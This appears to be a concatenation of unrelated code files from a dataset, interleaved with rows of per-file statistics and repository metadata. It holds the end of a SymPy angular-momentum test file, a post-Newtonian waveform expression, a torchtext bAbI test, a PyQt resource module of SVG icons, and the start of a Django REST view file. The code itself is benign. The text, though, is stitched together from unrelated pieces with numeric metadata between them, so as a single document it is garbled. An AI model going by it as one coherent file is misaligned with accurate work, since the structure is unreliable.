WignerD(j2, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
Jz * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m1 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar * m2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
# Uncoupled Operators
# Numerical
assert (
qapply(TensorProduct(Jz, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 0), JxKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jz) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert (
qapply(TensorProduct(Jz, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== -sqrt(2) * I * hbar * TensorProduct(JyKet(1, 0), JyKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jz) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== sqrt(2) * I * hbar * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == hbar * TensorProduct(JzKet(1, 1), JzKet(1, -1))
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == -hbar * TensorProduct(JzKet(1, 1), JzKet(1, -1))
# Symbolic
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jz, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m1 * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
assert qapply(
TensorProduct(1, Jz) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * m2 * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
def test_rotation():
a, b, g = symbols("a b g")
j, m = symbols("j m")
# Uncoupled
answ = [
JxKet(1, -1) / 2 - sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, 1) / 2,
JyKet(1, -1) / 2 - sqrt(2) * JyKet(1, 0) / 2 + JyKet(1, 1) / 2,
JzKet(1, -1) / 2 - sqrt(2) * JzKet(1, 0) / 2 + JzKet(1, 1) / 2,
]
fun = [state(1, 1) for state in (JxKet, JyKet, JzKet)]
for state in fun:
got = qapply(Rotation(0, pi / 2, 0) * state)
assert got in answ
answ.remove(got)
assert not answ
arg = Rotation(a, b, g) * fun[0]
assert qapply(arg) == (
-exp(-I * a) * exp(I * g) * cos(b) * JxKet(1, -1) / 2
+ exp(-I * a) * exp(I * g) * JxKet(1, -1) / 2
- sqrt(2) * exp(-I * a) * sin(b) * JxKet(1, 0) / 2
+ exp(-I * a) * exp(-I * g) * cos(b) * JxKet(1, 1) / 2
+ exp(-I * a) * exp(-I * g) * JxKet(1, 1) / 2
)
# dummy effective
assert str(qapply(Rotation(a, b, g) * JzKet(j, m), dummy=False)) == str(
qapply(Rotation(a, b, g) * JzKet(j, m), dummy=True)
).replace("_", "")
# Coupled
ans = [
JxKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * JxKetCoupled(1, 0, (1, 1)) / 2
+ JxKetCoupled(1, 1, (1, 1)) / 2,
JyKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * JyKetCoupled(1, 0, (1, 1)) / 2
+ JyKetCoupled(1, 1, (1, 1)) / 2,
JzKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ JzKetCoupled(1, 1, (1, 1)) / 2,
]
fun = [state(1, 1, (1, 1)) for state in (JxKetCoupled, JyKetCoupled, JzKetCoupled)]
for state in fun:
got = qapply(Rotation(0, pi / 2, 0) * state)
assert got in ans
ans.remove(got)
assert not ans
arg = Rotation(a, b, g) * fun[0]
assert qapply(arg) == (
-exp(-I * a) * exp(I * g) * cos(b) * JxKetCoupled(1, -1, (1, 1)) / 2
+ exp(-I * a) * exp(I * g) * JxKetCoupled(1, -1, (1, 1)) / 2
- sqrt(2) * exp(-I * a) * sin(b) * JxKetCoupled(1, 0, (1, 1)) / 2
+ exp(-I * a) * exp(-I * g) * cos(b) * JxKetCoupled(1, 1, (1, 1)) / 2
+ exp(-I * a) * exp(-I * g) * JxKetCoupled(1, 1, (1, 1)) / 2
)
# dummy effective
assert str(
qapply(Rotation(a, b, g) * JzKetCoupled(j, m, (j1, j2)), dummy=False)
) == str(
qapply(Rotation(a, b, g) * JzKetCoupled(j, m, (j1, j2)), dummy=True)
).replace(
"_", ""
)
def test_jzket():
j, m = symbols("j m")
# j not integer or half integer
raises(ValueError, lambda: JzKet(Rational(2, 3), Rational(-1, 3)))
raises(ValueError, lambda: JzKet(Rational(2, 3), m))
# j < 0
raises(ValueError, lambda: JzKet(-1, 1))
raises(ValueError, lambda: JzKet(-1, m))
# m not integer or half integer
raises(ValueError, lambda: JzKet(j, Rational(-1, 3)))
# abs(m) > j
raises(ValueError, lambda: JzKet(1, 2))
raises(ValueError, lambda: JzKet(1, -2))
# j-m not integer
raises(ValueError, lambda: JzKet(1, S.Half))
def test_jzketcoupled():
j, m = symbols("j m")
# j not integer or half integer
raises(ValueError, lambda: JzKetCoupled(Rational(2, 3), Rational(-1, 3), (1,)))
raises(ValueError, lambda: JzKetCoupled(Rational(2, 3), m, (1,)))
# j < 0
raises(ValueError, lambda: JzKetCoupled(-1, 1, (1,)))
raises(ValueError, lambda: JzKetCoupled(-1, m, (1,)))
# m not integer or half integer
raises(ValueError, lambda: JzKetCoupled(j, Rational(-1, 3), (1,)))
# abs(m) > j
raises(ValueError, lambda: JzKetCoupled(1, 2, (1,)))
raises(ValueError, lambda: JzKetCoupled(1, -2, (1,)))
# j-m not integer
raises(ValueError, lambda: JzKetCoupled(1, S.Half, (1,)))
# checks types on coupling scheme
raises(TypeError, lambda: JzKetCoupled(1, 1, 1))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1,), 1))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1, 1), (1,)))
raises(TypeError, lambda: JzKetCoupled(1, 1, (1, 1, 1), (1, 2, 1), (1, 3, 1)))
# checks length of coupling terms
raises(ValueError, lambda: JzKetCoupled(1, 1, (1,), ((1, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 2),)))
# all jn are integer or half-integer
raises(ValueError, lambda: JzKetCoupled(1, 1, (Rational(1, 3), Rational(2, 3))))
# indices in coupling scheme must be integers
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((S.Half, 1, 2),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, S.Half, 2),)))
# indices out of range
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((0, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((3, 2, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 0, 1),)))
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 3, 1),)))
# all j values in coupling scheme must by integer or half-integer
raises(
ValueError, lambda: JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, S(4) / 3), (1, 3, 1)))
)
# each coupling must satisfy |j1-j2| <= j3 <= j1+j2
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 5)))
raises(ValueError, lambda: JzKetCoupled(5, 1, (1, 1)))
# final j of coupling must be j of the state
raises(ValueError, lambda: JzKetCoupled(1, 1, (1, 1), ((1, 2, 2),)))
| 31.475835
| 88
| 0.400342
| 59,848
| 459,799
| 3.074021
| 0.00269
| 0.165159
| 0.083751
| 0.133171
| 0.986308
| 0.981139
| 0.973507
| 0.964332
| 0.952395
| 0.94265
| 0
| 0.104792
| 0.402385
| 459,799
| 14,607
| 89
| 31.47799
| 0.564733
| 0.007999
| 0
| 0.708008
| 0
| 0
| 0.000886
| 0
| 0
| 0
| 0
| 0
| 0.092006
| 1
| 0.002651
| false
| 0
| 0.000558
| 0
| 0.003209
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79eacad242585ca8fffc62922749ed2be91cff44
| 41
|
py
|
Python
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 18
|
2015-03-26T01:04:36.000Z
|
2022-02-01T19:26:21.000Z
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 4
|
2015-01-08T23:46:29.000Z
|
2017-09-20T19:13:51.000Z
|
Waveforms/results/hSymmetric_3_2.py
|
keefemitman/PostNewtonian
|
853d6577cb0002da5eebe1cb55f0c28fbc114324
|
[
"MIT"
] | 3
|
2016-05-13T02:36:14.000Z
|
2021-11-23T21:36:32.000Z
|
8*sqrt(7)*sqrt(pi)*nu*r(0)**3*v(0)**10/21
| 41
| 41
| 0.560976
| 13
| 41
| 1.769231
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 0
| 41
| 1
| 41
| 41
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cef3ff965d1255bbb59a4f29b2bc258f946b2ba0
| 1,937
|
py
|
Python
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 1
|
2021-04-16T08:31:30.000Z
|
2021-04-16T08:31:30.000Z
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 3
|
2021-02-24T22:51:20.000Z
|
2021-03-05T02:38:15.000Z
|
test/legacy/babi.py
|
parmeet/text
|
1fb2aedb48b5ecc5e81741e7c8504486b91655c6
|
[
"BSD-3-Clause"
] | 1
|
2021-06-21T07:13:53.000Z
|
2021-06-21T07:13:53.000Z
|
from torchtext.legacy import datasets
# en-valid
TRAIN_NUM = [0] + [900] * 16 + [904, 905, 900, 904]
VAL_NUM = [0] + [100] * 16 + [96, 95, 100, 96]
TEST_NUM = [0] + [1000] * 20
# Testcase 1 (joint training)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, joint=True)
assert len(train_iter.dataset) == sum(TRAIN_NUM)
assert len(val_iter.dataset) == VAL_NUM[1]
assert len(test_iter.dataset) == TEST_NUM[1]
# Testcase 2 (only supporting)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, only_supporting=True)
assert len(train_iter.dataset) == TRAIN_NUM[2]
assert len(val_iter.dataset) == VAL_NUM[2]
assert len(test_iter.dataset) == TEST_NUM[2]
# Testcase 3 (single task)
for i in range(1, 21):
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=i)
assert len(train_iter.dataset) == TRAIN_NUM[i]
assert len(val_iter.dataset) == VAL_NUM[i]
assert len(test_iter.dataset) == TEST_NUM[i]
# en-valid-10k
TRAIN_NUM = [0] + [9000] * 17 + [8996, 9000, 9002]
VAL_NUM = [0] + [1000] * 17 + [1004, 1000, 998]
TEST_NUM = [0] + [1000] * 20
# Testcase 1 (joint training)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, joint=True, tenK=True)
assert len(train_iter.dataset) == sum(TRAIN_NUM)
assert len(val_iter.dataset) == VAL_NUM[1]
assert len(test_iter.dataset) == TEST_NUM[1]
# Testcase 2 (only supporting)
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=1, only_supporting=True,
tenK=True)
assert len(train_iter.dataset) == TRAIN_NUM[2]
assert len(val_iter.dataset) == VAL_NUM[2]
assert len(test_iter.dataset) == TEST_NUM[2]
# Testcase 3 (single task)
for i in range(1, 21):
train_iter, val_iter, test_iter = datasets.BABI20.iters(task=i, tenK=True)
assert len(train_iter.dataset) == TRAIN_NUM[i]
assert len(val_iter.dataset) == VAL_NUM[i]
assert len(test_iter.dataset) == TEST_NUM[i]
| 37.980392
| 86
| 0.691791
| 316
| 1,937
| 4.044304
| 0.164557
| 0.126761
| 0.056338
| 0.075117
| 0.884194
| 0.884194
| 0.884194
| 0.884194
| 0.881064
| 0.871674
| 0
| 0.076355
| 0.16159
| 1,937
| 50
| 87
| 38.74
| 0.710591
| 0.095509
| 0
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.529412
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
063c85f0a1f4f874816ee9302107f906c9a7a7fb
| 6,699
|
py
|
Python
|
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
buildnotifylib/generated/icons_rc.py
|
rwilsonncsa/buildnotify
|
35a960937c2b77d5c802162a8a83d02640d6e55c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Tue Mar 18 20:49:08 2014
# by: The Resource Compiler for PyQt (Qt v4.8.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x00\xcd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x34\x36\x2c\x32\x30\x38\x2c\x38\
\x30\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xcd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x34\x36\x2c\x32\x30\x38\x2c\x38\
\x30\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xce\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x31\x30\x32\x2c\x31\x30\x32\x2c\x31\
\x30\x32\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\
\x2e\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x67\x62\x28\x32\x35\x35\x2c\x31\x35\x33\x2c\x30\
\x29\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\x61\x63\x6b\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x35\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x35\
\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x00\xc1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x3e\x0a\x20\x20\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x30\x22\x20\x79\x3d\x22\x30\x22\x20\x72\x78\x3d\x22\x31\x35\
\x30\x22\x20\x72\x79\x3d\x22\x31\x35\x30\x22\x20\x77\x69\x64\x74\
\x68\x3d\x22\x37\x34\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x37\x34\x34\x22\x0a\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x72\x65\x64\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x62\x6c\
\x61\x63\x6b\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3a\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x30\x2e\x35\x22\x2f\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\
"
qt_resource_name = "\
\x00\x06\
\x07\xaa\x8b\xc3\
\x00\x73\
\x00\x74\x00\x61\x00\x74\x00\x75\x00\x73\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x17\
\x02\x27\x97\xc7\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x73\x00\x75\x00\x63\x00\x63\x00\x65\
\x00\x73\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x20\
\x02\xe1\xd6\x67\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x73\x00\x75\x00\x63\x00\x63\x00\x65\
\x00\x73\x00\x73\x00\x2d\x00\x62\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x18\
\x06\x07\x4c\x67\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x69\x00\x6e\x00\x61\x00\x63\x00\x74\
\x00\x69\x00\x76\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x20\
\x03\xb9\xe4\x87\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x66\x00\x61\x00\x69\x00\x6c\x00\x75\
\x00\x72\x00\x65\x00\x2d\x00\x62\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x17\
\x02\xec\x1c\x87\
\x00\x62\
\x00\x75\x00\x69\x00\x6c\x00\x64\x00\x6e\x00\x6f\x00\x74\x00\x69\x00\x66\x00\x79\x00\x2d\x00\x66\x00\x61\x00\x69\x00\x6c\x00\x75\
\x00\x72\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x12\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\
\x00\x00\x00\x22\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x56\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd1\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x03\x44\
\x00\x00\x00\xd2\x00\x00\x00\x00\x00\x01\x00\x00\x02\x74\
\x00\x00\x00\x9c\x00\x00\x00\x00\x00\x01\x00\x00\x01\xa2\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 46.520833
| 129
| 0.723242
| 1,553
| 6,699
| 3.108178
| 0.081777
| 0.087011
| 0.07831
| 0.044748
| 0.875078
| 0.866377
| 0.865134
| 0.856433
| 0.841516
| 0.828465
| 0
| 0.403387
| 0.030452
| 6,699
| 143
| 130
| 46.846154
| 0.3398
| 0.027019
| 0
| 0.546875
| 0
| 0.648438
| 0
| 0
| 0
| 1
| 0.001229
| 0
| 0
| 1
| 0.015625
| false
| 0
| 0.007813
| 0
| 0.023438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
065370ad3a1ca4e10e67a9cbad43334d8a237551
| 27,824
|
py
|
Python
|
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
CourseOutlineBackend/courseoutline/views.py
|
stancsz/web-development-project-ensf-607
|
03b11df4971afd4f27fee54a1800a40d4cc10240
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.mixins import UpdateModelMixin, DestroyModelMixin
from .models import *
from .serializers import *
class CoordinatorPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Coordinator.objects.filter(CourseID=CourseID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = CoordinatorSerializer(queryset, many=True)
else:
queryset = Coordinator.objects.all()
read_serializer = CoordinatorSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = CoordinatorSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = CoordinatorSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class CoordinatorPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Coordinator.objects.get(ModelID=ModelID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = CoordinatorSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = CoordinatorSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Coordinator.objects.get(ModelID=ModelID)
except Coordinator.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class InfoPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
